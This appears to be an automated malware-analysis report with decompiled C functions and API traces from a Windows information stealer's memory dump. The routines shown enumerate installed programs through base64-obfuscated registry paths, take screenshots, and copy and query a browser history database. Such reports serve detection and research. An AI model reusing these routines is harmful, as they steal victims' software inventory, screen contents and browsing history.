• LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2,?,00000001,), ref: 00416C32
• GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416C38
• LoadLibraryA.KERNEL32(00000000,00000000,00000000,kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2), ref: 00416C77
• GetProcAddress.KERNEL32(00000000,00000000), ref: 00416C7D
• GetCurrentProcessId.KERNEL32(?,-00000001,0041B0FC,?,?,004174B2,?,00000001,,?,?,,?,Zone: ,?,004175A8), ref: 00416DAA
Strings
Memory Dump Source
• Source File: 00000006.00000002.371678133.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: AddressLibraryLoadProc$CurrentProcess
• String ID: Q3JlYXRlVG9vbGhlbHAzMlNuYXBzaG90$UHJvY2VzczMyRmlyc3RX$UHJvY2VzczMyTmV4dFc=$a2VybmVsMzIuZGxs$kernel32.dll
• API String ID: 3877065590-4127804628
• Opcode ID: 0f8ae1aecedffc538cedfaaf6d2ef413c8cc501e5b20150028d7674d04a881bf
• Instruction ID: fd76d8ed353255a1278cd755ee3df483ef4fe920b1e5afc451e9d1c12470fbd9
• Opcode Fuzzy Hash: 0f8ae1aecedffc538cedfaaf6d2ef413c8cc501e5b20150028d7674d04a881bf
• Instruction Fuzzy Hash: B2818570A006099BCB10EF69C985ADEB7B9FF84304F1181BAE509B7291D739DF858F58
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                                                                          C-Code - Quality: 51%
                                                                                                                                                                                          			E00415F30(intOrPtr* __eax, void* __ebx, void* __edi, void* __esi) {
                                                                                                                                                                                          				void* _v8;
                                                                                                                                                                                          				char _v1009;
                                                                                                                                                                                          				char _v1016;
                                                                                                                                                                                          				intOrPtr _v1020;
                                                                                                                                                                                          				char _v1024;
                                                                                                                                                                                          				char _v1028;
                                                                                                                                                                                          				char _v1032;
                                                                                                                                                                                          				char _v1036;
                                                                                                                                                                                          				char _v1040;
                                                                                                                                                                                          				char _v1044;
                                                                                                                                                                                          				char _v1048;
                                                                                                                                                                                          				char _v1052;
                                                                                                                                                                                          				char _v1056;
                                                                                                                                                                                          				char _v1060;
                                                                                                                                                                                          				char _v1064;
                                                                                                                                                                                          				char _v1068;
                                                                                                                                                                                          				char _v1072;
                                                                                                                                                                                          				char _v1076;
                                                                                                                                                                                          				intOrPtr _v1080;
                                                                                                                                                                                          				char _v1084;
                                                                                                                                                                                          				char _v1088;
                                                                                                                                                                                          				char _v1092;
                                                                                                                                                                                          				char _v1096;
                                                                                                                                                                                          				char _v1100;
                                                                                                                                                                                          				char _v1104;
                                                                                                                                                                                          				char _v1108;
                                                                                                                                                                                          				char _v1112;
                                                                                                                                                                                          				char _v1116;
                                                                                                                                                                                          				char _v1120;
                                                                                                                                                                                          				char _v1124;
                                                                                                                                                                                          				char _v1128;
                                                                                                                                                                                          				char _v1132;
                                                                                                                                                                                          				char _v1136;
                                                                                                                                                                                          				char _v1140;
                                                                                                                                                                                          				char _v1144;
                                                                                                                                                                                          				char _v1148;
                                                                                                                                                                                          				void* _t123;
                                                                                                                                                                                          				void* _t144;
                                                                                                                                                                                          				void* _t178;
                                                                                                                                                                                          				void* _t199;
                                                                                                                                                                                          				intOrPtr* _t262;
                                                                                                                                                                                          				void* _t263;
                                                                                                                                                                                          				void* _t265;
                                                                                                                                                                                          				void* _t267;
                                                                                                                                                                                          				void* _t269;
                                                                                                                                                                                          				void* _t271;
                                                                                                                                                                                          				intOrPtr _t318;
                                                                                                                                                                                          				char* _t329;
                                                                                                                                                                                          				int _t331;
                                                                                                                                                                                          				int _t332;
                                                                                                                                                                                          				intOrPtr _t334;
                                                                                                                                                                                          				intOrPtr _t335;
                                                                                                                                                                                          
                                                                                                                                                                                          				_t334 = _t335;
                                                                                                                                                                                          				_t263 = 0x8f;
                                                                                                                                                                                          				do {
                                                                                                                                                                                          					_push(0);
                                                                                                                                                                                          					_push(0);
                                                                                                                                                                                          					_t263 = _t263 - 1;
                                                                                                                                                                                          				} while (_t263 != 0);
                                                                                                                                                                                          				_t262 = __eax;
                                                                                                                                                                                          				_t329 =  &_v1009;
                                                                                                                                                                                          				_push(_t334);
                                                                                                                                                                                          				_push(0x416452);
                                                                                                                                                                                          				_push( *[fs:eax]);
                                                                                                                                                                                          				 *[fs:eax] = _t335;
                                                                                                                                                                                          				E004034E4(__eax);
                                                                                                                                                                                          				_t331 = 0;
                                                                                                                                                                                          				E00406984("U29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cVW5pbnN0YWxs", _t262,  &_v1016, _t329, 0);
                                                                                                                                                                                          				RegOpenKeyExA(0x80000002, E00403990(_v1016), 0, 0x20019,  &_v8);
                                                                                                                                                                                          				while(RegEnumKeyA(_v8, _t331, _t329, 0x3e9) == 0) {
                                                                                                                                                                                          					E00403D2C( &_v1024,  *_t262);
                                                                                                                                                                                          					_push(_v1024);
                                                                                                                                                                                          					_push(0);
                                                                                                                                                                                          					_push( &_v1028);
                                                                                                                                                                                          					E00406984("RGlzcGxheU5hbWU=", _t262,  &_v1036, _t329, _t331);
                                                                                                                                                                                          					E00403C98( &_v1032, E00403990(_v1036));
                                                                                                                                                                                          					_push(_v1032);
                                                                                                                                                                                          					E00406984("U29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cVW5pbnN0YWxsXA==", _t262,  &_v1044, _t329, _t331);
                                                                                                                                                                                          					_push( &_v1044);
                                                                                                                                                                                          					E00403748( &_v1048, 0x3e9, _t329);
                                                                                                                                                                                          					_pop(_t123);
                                                                                                                                                                                          					E00403798(_t123, _v1048);
                                                                                                                                                                                          					E00403C98( &_v1040, E00403990(_v1044));
                                                                                                                                                                                          					_pop(_t265);
                                                                                                                                                                                          					E00407500(0x80000002, _t262, _t265, _v1040);
                                                                                                                                                                                          					_push(_v1028);
                                                                                                                                                                                          					_push(0x416528);
                                                                                                                                                                                          					_push(0);
                                                                                                                                                                                          					_push( &_v1052);
                                                                                                                                                                                          					E00406984("RGlzcGxheVZlcnNpb24=", _t262,  &_v1060, _t329, _t331);
                                                                                                                                                                                          					E00403C98( &_v1056, E00403990(_v1060));
                                                                                                                                                                                          					_push(_v1056);
                                                                                                                                                                                          					E00406984("U29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cVW5pbnN0YWxsXA==", _t262,  &_v1068, _t329, _t331);
                                                                                                                                                                                          					_push( &_v1068);
                                                                                                                                                                                          					E00403748( &_v1072, 0x3e9, _t329);
                                                                                                                                                                                          					_pop(_t144);
                                                                                                                                                                                          					E00403798(_t144, _v1072);
                                                                                                                                                                                          					E00403C98( &_v1064, E00403990(_v1068));
                                                                                                                                                                                          					_pop(_t267);
                                                                                                                                                                                          					E00407500(0x80000002, _t262, _t267, _v1064);
                                                                                                                                                                                          					_push(_v1052);
                                                                                                                                                                                          					_push(")");
                                                                                                                                                                                          					E00403E1C();
                                                                                                                                                                                          					E0040377C(_t262, _v1020);
                                                                                                                                                                                          					_t331 = _t331 + 1;
                                                                                                                                                                                          				}
                                                                                                                                                                                          				_t332 = 0;
                                                                                                                                                                                          				E00406984("U29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cVW5pbnN0YWxs", _t262,  &_v1076, _t329, 0);
                                                                                                                                                                                          				RegOpenKeyExA(0x80000001, E00403990(_v1076), 0, 0x20019,  &_v8);
                                                                                                                                                                                          				while(RegEnumKeyA(_v8, _t332, _t329, 0x3e9) == 0) {
                                                                                                                                                                                          					E00403D2C( &_v1084,  *_t262);
                                                                                                                                                                                          					_push(_v1084);
                                                                                                                                                                                          					_push(0);
                                                                                                                                                                                          					_push( &_v1088);
                                                                                                                                                                                          					E00406984("RGlzcGxheU5hbWU=", _t262,  &_v1096, _t329, _t332);
                                                                                                                                                                                          					E00403C98( &_v1092, E00403990(_v1096));
                                                                                                                                                                                          					_push(_v1092);
                                                                                                                                                                                          					E00406984("U29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cVW5pbnN0YWxsXA==", _t262,  &_v1104, _t329, _t332);
                                                                                                                                                                                          					_push( &_v1104);
                                                                                                                                                                                          					E00403748( &_v1108, 0x3e9, _t329);
                                                                                                                                                                                          					_pop(_t178);
                                                                                                                                                                                          					E00403798(_t178, _v1108);
                                                                                                                                                                                          					E00403C98( &_v1100, E00403990(_v1104));
                                                                                                                                                                                          					_pop(_t269);
                                                                                                                                                                                          					E00407500(0x80000001, _t262, _t269, _v1100);
                                                                                                                                                                                          					_push(_v1088);
                                                                                                                                                                                          					_push(0x416528);
                                                                                                                                                                                          					_push(0);
                                                                                                                                                                                          					_push( &_v1112);
                                                                                                                                                                                          					E00406984("RGlzcGxheVZlcnNpb24=", _t262,  &_v1120, _t329, _t332);
                                                                                                                                                                                          					E00403C98( &_v1116, E00403990(_v1120));
                                                                                                                                                                                          					_push(_v1116);
                                                                                                                                                                                          					E00406984("U29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cVW5pbnN0YWxsXA==", _t262,  &_v1128, _t329, _t332);
                                                                                                                                                                                          					_push( &_v1128);
                                                                                                                                                                                          					E00403748( &_v1132, 0x3e9, _t329);
                                                                                                                                                                                          					_pop(_t199);
                                                                                                                                                                                          					E00403798(_t199, _v1132);
                                                                                                                                                                                          					E00403C98( &_v1124, E00403990(_v1128));
                                                                                                                                                                                          					_pop(_t271);
                                                                                                                                                                                          					E00407500(0x80000001, _t262, _t271, _v1124);
                                                                                                                                                                                          					_push(_v1112);
                                                                                                                                                                                          					_push(")");
                                                                                                                                                                                          					E00403E1C();
                                                                                                                                                                                          					E0040377C(_t262, _v1080);
                                                                                                                                                                                          					_t332 = _t332 + 1;
                                                                                                                                                                                          				}
                                                                                                                                                                                          				E00403D2C( &_v1140,  *_t262);
                                                                                                                                                                                          				E004070BC(_v1140, _t262, 0x41655c, L"()\r\n",  &_v1136);
                                                                                                                                                                                          				E0040377C(_t262, _v1136);
                                                                                                                                                                                          				E00403D2C( &_v1148,  *_t262);
                                                                                                                                                                                          				E004070BC(_v1148, _t262, 0x41655c, L"\r\n\r\n",  &_v1144);
                                                                                                                                                                                          				E0040377C(_t262, _v1144);
                                                                                                                                                                                          				_pop(_t318);
                                                                                                                                                                                          				 *[fs:eax] = _t318;
                                                                                                                                                                                          				_push(E0041645C);
                                                                                                                                                                                          				E00403B98( &_v1148, 4);
                                                                                                                                                                                          				E00403508( &_v1132, 2);
                                                                                                                                                                                          				E00403B80( &_v1124);
                                                                                                                                                                                          				E004034E4( &_v1120);
                                                                                                                                                                                          				E00403B98( &_v1116, 2);
                                                                                                                                                                                          				E00403508( &_v1108, 2);
                                                                                                                                                                                          				E00403B80( &_v1100);
                                                                                                                                                                                          				E004034E4( &_v1096);
                                                                                                                                                                                          				E00403B98( &_v1092, 4);
                                                                                                                                                                                          				E00403508( &_v1076, 3);
                                                                                                                                                                                          				E00403B80( &_v1064);
                                                                                                                                                                                          				E004034E4( &_v1060);
                                                                                                                                                                                          				E00403B98( &_v1056, 2);
                                                                                                                                                                                          				E00403508( &_v1048, 2);
                                                                                                                                                                                          				E00403B80( &_v1040);
                                                                                                                                                                                          				E004034E4( &_v1036);
                                                                                                                                                                                          				E00403B98( &_v1032, 4);
                                                                                                                                                                                          				return E004034E4( &_v1016);
                                                                                                                                                                                          			}


                                                                                                                                                                                          APIs
                                                                                                                                                                                          • RegOpenKeyExA.ADVAPI32(80000002,00000000,00000000,00020019,0041A69E,00000000,00416452,?,-00000001,0041B0FC,?,00000000,00000000,?,004174F9,00000001), ref: 00415F8D
                                                                                                                                                                                          • RegEnumKeyA.ADVAPI32(0041A69E,00000000,?,000003E9), ref: 00416115
                                                                                                                                                                                          • RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,0041A69E,0041A69E,00000001,?,000003E9,),?,?,00000000,00416528,?,?), ref: 00416150
                                                                                                                                                                                          • RegEnumKeyA.ADVAPI32(0041A69E,00000000,?,000003E9), ref: 004162D8
                                                                                                                                                                                            • Part of subcall function 00407500: RegQueryValueExW.KERNELBASE(?,00000000,00000000,00000001,00000000,000000FE), ref: 004075A9
                                                                                                                                                                                            • Part of subcall function 00407500: RegOpenKeyExW.KERNELBASE(80000002,00000000,00000000,00020019,?), ref: 00407582
                                                                                                                                                                                            • Part of subcall function 00403B80: SysFreeString.OLEAUT32(00000000), ref: 00403B8E
                                                                                                                                                                                            • Part of subcall function 00403B98: SysFreeString.OLEAUT32(?), ref: 00403BAB
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000006.00000002.371678133.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Open$EnumFreeString$QueryValue
                                                                                                                                                                                          • String ID: $()$)$RGlzcGxheU5hbWU=$RGlzcGxheVZlcnNpb24=$U29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cVW5pbnN0YWxs$U29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cVW5pbnN0YWxsXA==
                                                                                                                                                                                          • API String ID: 811798878-3013244427
                                                                                                                                                                                          • Opcode ID: de493516d1551eb8ed3128fa62d2f5255a1c7b72798445e0c46a5ea88ad76063
                                                                                                                                                                                          • Instruction ID: 33798bc805095534a257e2f05040e6cfe59ff7211d39a9aa4329e2c1f04a858c
                                                                                                                                                                                          • Opcode Fuzzy Hash: de493516d1551eb8ed3128fa62d2f5255a1c7b72798445e0c46a5ea88ad76063
                                                                                                                                                                                          • Instruction Fuzzy Hash: 34C124B1A001189BD710EB55CC81BCEB7BDAF44309F5145FBA608B7286DA38AF858F5D
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          C-Code - Quality: 30%
                                                                                                                                                                                          			E004178B4(int __eax, void* __ebx, int __ecx, int __edx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, char _a12, int _a16) {
                                                                                                                                                                                          				int _v8;
                                                                                                                                                                                          				int _v12;
                                                                                                                                                                                          				int _v16;
                                                                                                                                                                                          				char _v20;
                                                                                                                                                                                          				char _v24;
                                                                                                                                                                                          				char _v28;
                                                                                                                                                                                          				void* _v32;
                                                                                                                                                                                          				struct HWND__* _v48;
                                                                                                                                                                                          				struct HWND__* _v52;
                                                                                                                                                                                          				struct HWND__* _v56;
                                                                                                                                                                                          				char _v60;
                                                                                                                                                                                          				intOrPtr _v124;
                                                                                                                                                                                          				char _v132;
                                                                                                                                                                                          				char _v148;
                                                                                                                                                                                          				char* _v152;
                                                                                                                                                                                          				intOrPtr _v156;
                                                                                                                                                                                          				intOrPtr _v160;
                                                                                                                                                                                          				void* _v176;
                                                                                                                                                                                          				char _v180;
                                                                                                                                                                                          				intOrPtr* _t78;
                                                                                                                                                                                          				struct HDC__* _t100;
                                                                                                                                                                                          				intOrPtr _t107;
                                                                                                                                                                                          				void* _t112;
                                                                                                                                                                                          				void* _t114;
                                                                                                                                                                                          				struct HDC__* _t116;
                                                                                                                                                                                          				struct HDC__* _t118;
                                                                                                                                                                                          				void* _t121;
                                                                                                                                                                                          
                                                                                                                                                                                          				_v28 = 0;
                                                                                                                                                                                          				_v16 = __ecx;
                                                                                                                                                                                          				_v12 = __edx;
                                                                                                                                                                                          				_v8 = __eax;
                                                                                                                                                                                          				_push(_t121);
                                                                                                                                                                                          				_push(0x417adb);
                                                                                                                                                                                          				_push( *[fs:eax]);
                                                                                                                                                                                          				 *[fs:eax] = _t121 + 0xffffff50;
                                                                                                                                                                                          				if( *0x41c868 != 0 &&  *0x41c86c != 0 &&  *0x41c870 != 0 &&  *0x41c874 != 0 &&  *0x41c878 != 0 &&  *0x41c87c != 0 &&  *0x41c880 != 0 &&  *0x41c884 != 0 &&  *0x41c888 != 0 &&  *0x41c88c != 0) {
                                                                                                                                                                                          					_v60 = 1;
                                                                                                                                                                                          					_v56 = 0;
                                                                                                                                                                                          					_v52 = 0;
                                                                                                                                                                                          					_v48 = 0;
                                                                                                                                                                                          					_push(0);
                                                                                                                                                                                          					_push( &_v60);
                                                                                                                                                                                          					_push( &_v20);
                                                                                                                                                                                          					if( *0x41c86c() == 0) {
                                                                                                                                                                                          						_t100 = GetDC(0);
                                                                                                                                                                                          						_t116 = CreateCompatibleDC(0);
                                                                                                                                                                                          						_t112 = CreateCompatibleBitmap(_t100, _v8, _v12);
                                                                                                                                                                                          						SelectObject(_t116, _t112);
                                                                                                                                                                                          						BitBlt(_t116, 0, 0, _v8, _v12, _t100, _v16, _a16, 0xcc0020);
                                                                                                                                                                                          						 *0x41c888(0, 0xffffffff, E00404900( &_v28));
                                                                                                                                                                                          						 *0x41c874(_t112, 0,  &_v24);
                                                                                                                                                                                          						E004177E0(_a8, _t100,  &_v148, _t112, _t116);
                                                                                                                                                                                          						_v180 = 1;
                                                                                                                                                                                          						asm("movsd");
                                                                                                                                                                                          						asm("movsd");
                                                                                                                                                                                          						asm("movsd");
                                                                                                                                                                                          						asm("movsd");
                                                                                                                                                                                          						_t114 = _t112;
                                                                                                                                                                                          						_t118 = _t116;
                                                                                                                                                                                          						_v160 = 1;
                                                                                                                                                                                          						_v156 = 4;
                                                                                                                                                                                          						_v152 =  &_a12;
                                                                                                                                                                                          						 *0x41c884(_v24, _v28,  &_v148,  &_v180);
                                                                                                                                                                                          						_t78 = _v28;
                                                                                                                                                                                          						 *((intOrPtr*)( *_t78 + 0x30))(_t78,  &_v132, 1);
                                                                                                                                                                                          						 *0x41c88c(_v28,  &_v32);
                                                                                                                                                                                          						GlobalFix(_v32);
                                                                                                                                                                                          						E004035D4(_a4, _v124, _v32);
                                                                                                                                                                                          						 *0x41c880(_v24);
                                                                                                                                                                                          						GlobalUnWire(_v32);
                                                                                                                                                                                          						DeleteObject(_t114);
                                                                                                                                                                                          						DeleteDC(_t118);
                                                                                                                                                                                          						ReleaseDC(0, _t100);
                                                                                                                                                                                          						 *0x41c870(_v20);
                                                                                                                                                                                          					}
                                                                                                                                                                                          				}
                                                                                                                                                                                          				_pop(_t107);
                                                                                                                                                                                          				 *[fs:eax] = _t107;
                                                                                                                                                                                          				_push(E00417AE2);
                                                                                                                                                                                          				return E00404900( &_v28);
                                                                                                                                                                                          			}































                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetDC.USER32(00000000), ref: 00417994
                                                                                                                                                                                          • CreateCompatibleDC.GDI32(00000000), ref: 0041799D
                                                                                                                                                                                          • CreateCompatibleBitmap.GDI32(00000000,0041A69E,?), ref: 004179AD
                                                                                                                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 004179B6
                                                                                                                                                                                          • BitBlt.GDI32(00000000,00000000,00000000,0041A69E,?,00000000,00000000,?,00CC0020), ref: 004179D6
                                                                                                                                                                                          • GlobalFix.KERNEL32 ref: 00417A80
                                                                                                                                                                                          • GlobalUnWire.KERNEL32(?), ref: 00417AA2
                                                                                                                                                                                          • DeleteObject.GDI32(00000000), ref: 00417AA8
                                                                                                                                                                                          • DeleteDC.GDI32(00000000), ref: 00417AAE
                                                                                                                                                                                          • ReleaseDC.USER32 ref: 00417AB6
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000006.00000002.371678133.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CompatibleCreateDeleteGlobalObject$BitmapReleaseSelectWire
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 914135935-0
                                                                                                                                                                                          • Opcode ID: c6339665ace03b91d436a6d8c1ab4105ac859371922734f0929d45322917c03e
                                                                                                                                                                                          • Instruction ID: 9ea5443061d6a736e16c7905b4946b830ee6406ef7c7b01cecb07d86951751fb
                                                                                                                                                                                          • Opcode Fuzzy Hash: c6339665ace03b91d436a6d8c1ab4105ac859371922734f0929d45322917c03e
                                                                                                                                                                                          • Instruction Fuzzy Hash: 9B513CB1944208AFDB10EFA5DC85BEF7BF8AB48305F24402AF614E62D1D7789985CB58
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          C-Code - Quality: 49%
                                                                                                                                                                                          			E004129A4(char __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
                                                                                                                                                                                          				char _v8;
                                                                                                                                                                                          				intOrPtr _v12;
                                                                                                                                                                                          				char _v16;
                                                                                                                                                                                          				char _v20;
                                                                                                                                                                                          				char _v24;
                                                                                                                                                                                          				char _v28;
                                                                                                                                                                                          				char _v32;
                                                                                                                                                                                          				char _v36;
                                                                                                                                                                                          				char _v40;
                                                                                                                                                                                          				char _v44;
                                                                                                                                                                                          				char _v48;
                                                                                                                                                                                          				char _v52;
                                                                                                                                                                                          				char _v56;
                                                                                                                                                                                          				char _v60;
                                                                                                                                                                                          				char _v64;
                                                                                                                                                                                          				intOrPtr _v68;
                                                                                                                                                                                          				char _v72;
                                                                                                                                                                                          				char _v76;
                                                                                                                                                                                          				char _v80;
                                                                                                                                                                                          				char _v84;
                                                                                                                                                                                          				char _v88;
                                                                                                                                                                                          				char _v92;
                                                                                                                                                                                          				long _t73;
                                                                                                                                                                                          				WCHAR* _t86;
                                                                                                                                                                                          				intOrPtr* _t101;
                                                                                                                                                                                          				void* _t103;
                                                                                                                                                                                          				intOrPtr* _t105;
                                                                                                                                                                                          				intOrPtr* _t109;
                                                                                                                                                                                          				intOrPtr* _t138;
                                                                                                                                                                                          				void* _t140;
                                                                                                                                                                                          				intOrPtr* _t142;
                                                                                                                                                                                          				void* _t144;
                                                                                                                                                                                          				intOrPtr* _t152;
                                                                                                                                                                                          				intOrPtr* _t158;
                                                                                                                                                                                          				intOrPtr* _t164;
                                                                                                                                                                                          				void* _t166;
                                                                                                                                                                                          				void* _t178;
                                                                                                                                                                                          				intOrPtr _t198;
                                                                                                                                                                                          				intOrPtr _t200;
                                                                                                                                                                                          				intOrPtr _t213;
                                                                                                                                                                                          				intOrPtr _t217;
                                                                                                                                                                                          				intOrPtr _t218;
                                                                                                                                                                                          				void* _t219;
                                                                                                                                                                                          				void* _t220;
                                                                                                                                                                                          
                                                                                                                                                                                          				_t215 = __esi;
                                                                                                                                                                                          				_t177 = __ebx;
                                                                                                                                                                                          				_t217 = _t218;
                                                                                                                                                                                          				_t178 = 0xb;
                                                                                                                                                                                          				do {
                                                                                                                                                                                          					_push(0);
                                                                                                                                                                                          					_push(0);
                                                                                                                                                                                          					_t178 = _t178 - 1;
                                                                                                                                                                                          					_t223 = _t178;
                                                                                                                                                                                          				} while (_t178 != 0);
                                                                                                                                                                                          				_push(__ebx);
                                                                                                                                                                                          				_push(__esi);
                                                                                                                                                                                          				_push(__edi);
                                                                                                                                                                                          				_v12 = __edx;
                                                                                                                                                                                          				_v8 = __eax;
                                                                                                                                                                                          				_t3 =  &_v8; // 0x6f747365
                                                                                                                                                                                          				E004040F4(_t3);
                                                                                                                                                                                          				_push(_t217);
                                                                                                                                                                                          				_push(0x412c71);
                                                                                                                                                                                          				_push( *[fs:eax]);
                                                                                                                                                                                          				 *[fs:eax] = _t218;
                                                                                                                                                                                          				_t4 =  &_v28; // 0x6f747351
                                                                                                                                                                                          				E00403B80(_t4);
                                                                                                                                                                                          				_push(_t217);
                                                                                                                                                                                          				_push(0x412be7);
                                                                                                                                                                                          				_push( *[fs:eax]);
                                                                                                                                                                                          				 *[fs:eax] = _t218;
                                                                                                                                                                                          				_t73 = GetTickCount();
                                                                                                                                                                                          				_t5 =  &_v60; // 0x6f747331
                                                                                                                                                                                          				E00406FDC(_t73, __ebx, _t5, __esi, _t223);
                                                                                                                                                                                          				_push(_v60);
                                                                                                                                                                                          				_t7 =  &_v64; // 0x6f74732d
                                                                                                                                                                                          				E00406F1C(_t7, __ebx, __edi, __esi, _t223);
                                                                                                                                                                                          				_push(_v64);
                                                                                                                                                                                          				_push(L".tmp");
                                                                                                                                                                                          				E00403E1C();
                                                                                                                                                                                          				_t10 =  &_v40; // 0x6f747345
                                                                                                                                                                                          				E0040781C(_v8, _t177, _t10, _t223);
                                                                                                                                                                                          				_t12 =  &_v72; // 0x6f747325
                                                                                                                                                                                          				E004062D8(L"%TEMP%", _t12, _t223);
                                                                                                                                                                                          				_push(_v72);
                                                                                                                                                                                          				_push(0x412ca8);
                                                                                                                                                                                          				_push(_v32);
                                                                                                                                                                                          				E00403E1C();
                                                                                                                                                                                          				_t17 =  &_v44; // 0x6f747341
                                                                                                                                                                                          				E0040781C(_v68, _t177, _t17, _t223);
                                                                                                                                                                                          				_t86 = E00403D3C(_v44);
                                                                                                                                                                                          				CopyFileW(E00403D3C(_v40), _t86, 0xffffffff);
                                                                                                                                                                                          				_t20 =  &_v76; // 0x6f747321
                                                                                                                                                                                          				E0040377C(_t20, _v44);
                                                                                                                                                                                          				_t23 =  &_v36; // 0x6f747349
                                                                                                                                                                                          				E00404AFC(_v76, _t177, _t178, _t23, _t215, _t223);
                                                                                                                                                                                          				_t24 =  &_v80; // 0x6f74731d
                                                                                                                                                                                          				E00403D2C(_t24, _v36);
                                                                                                                                                                                          				if(E004076B0(_v80, _t177, _t178) != 0) {
                                                                                                                                                                                          					_t101 =  *0x41b55c; // 0x41c784
                                                                                                                                                                                          					_t103 =  *((intOrPtr*)( *_t101))(E00403990(_v36),  &_v16);
                                                                                                                                                                                          					_t219 = _t218 + 8;
                                                                                                                                                                                          					__eflags = _t103;
                                                                                                                                                                                          					if(_t103 == 0) {
                                                                                                                                                                                          						_t138 =  *0x41b5cc; // 0x41c78c
                                                                                                                                                                                          						_t140 =  *((intOrPtr*)( *_t138))(_v16, "SELECT DATETIME( ((visits.visit_time/1000000)-11644473600),\"unixepoch\") , urls.title , urls.url FROM urls, visits WHERE urls.id = visits.url ORDER By  visits.visit_time DESC LIMIT 0, 10000", 0xffffffff,  &_v20,  &_v24);
                                                                                                                                                                                          						_t220 = _t219 + 0x14;
                                                                                                                                                                                          						__eflags = _t140;
                                                                                                                                                                                          						if(_t140 == 0) {
                                                                                                                                                                                          							while(1) {
                                                                                                                                                                                          								_t142 =  *0x41b600; // 0x41c790
                                                                                                                                                                                          								_t144 =  *((intOrPtr*)( *_t142))(_v20);
                                                                                                                                                                                          								__eflags = _t144 - 0x64;
                                                                                                                                                                                          								if(_t144 != 0x64) {
                                                                                                                                                                                          									goto L9;
                                                                                                                                                                                          								}
                                                                                                                                                                                          								E004034E4( &_v48);
                                                                                                                                                                                          								E004034E4( &_v52);
                                                                                                                                                                                          								E004034E4( &_v56);
                                                                                                                                                                                          								_t152 =  *0x41b588; // 0x41c794
                                                                                                                                                                                          								E004036DC( &_v48,  *((intOrPtr*)( *_t152))(_v20, 0));
                                                                                                                                                                                          								_t158 =  *0x41b588; // 0x41c794
                                                                                                                                                                                          								E004036DC( &_v52,  *((intOrPtr*)( *_t158))(_v20, 1));
                                                                                                                                                                                          								_t164 =  *0x41b588; // 0x41c794
                                                                                                                                                                                          								_t166 =  *((intOrPtr*)( *_t164))(_v20, 2);
                                                                                                                                                                                          								_t220 = _t220 + 0x18;
                                                                                                                                                                                          								E004036DC( &_v56, _t166);
                                                                                                                                                                                          								_push(_v28);
                                                                                                                                                                                          								_push(E00412D70);
                                                                                                                                                                                          								E00403D2C( &_v84, _v48);
                                                                                                                                                                                          								_push(_v84);
                                                                                                                                                                                          								_push(0x412d78);
                                                                                                                                                                                          								E00403D2C( &_v88, _v52);
                                                                                                                                                                                          								_push(_v88);
                                                                                                                                                                                          								_push(0x412d84);
                                                                                                                                                                                          								E00403D2C( &_v92, _v56);
                                                                                                                                                                                          								_push(_v92);
                                                                                                                                                                                          								_push(L"\r\n\r\n");
                                                                                                                                                                                          								E00403E1C();
                                                                                                                                                                                          							}
                                                                                                                                                                                          						}
                                                                                                                                                                                          					}
                                                                                                                                                                                          					L9:
                                                                                                                                                                                          					_t105 =  *0x41b654; // 0x41c79c
                                                                                                                                                                                          					 *((intOrPtr*)( *_t105))(_v20);
                                                                                                                                                                                          					_t109 =  *0x41b590; // 0x41c788
                                                                                                                                                                                          					 *((intOrPtr*)( *_t109))(_v16);
                                                                                                                                                                                          					_pop(_t198);
                                                                                                                                                                                          					 *[fs:eax] = _t198;
                                                                                                                                                                                          					E00403BBC(_v12, _v28);
                                                                                                                                                                                          					DeleteFileW(E00403D3C(_v44));
                                                                                                                                                                                          				} else {
                                                                                                                                                                                          					_pop(_t213);
                                                                                                                                                                                          					 *[fs:eax] = _t213;
                                                                                                                                                                                          				}
                                                                                                                                                                                          				_pop(_t200);
                                                                                                                                                                                          				 *[fs:eax] = _t200;
                                                                                                                                                                                          				_push(E00412C78);
                                                                                                                                                                                          				_t58 =  &_v92; // 0x6f747311
                                                                                                                                                                                          				E00403B98(_t58, 4);
                                                                                                                                                                                          				_t59 =  &_v76; // 0x6f747321
                                                                                                                                                                                          				E004034E4(_t59);
                                                                                                                                                                                          				_t60 =  &_v72; // 0x6f747325
                                                                                                                                                                                          				E00403B98(_t60, 4);
                                                                                                                                                                                          				_t61 =  &_v56; // 0x6f747335
                                                                                                                                                                                          				E00403508(_t61, 3);
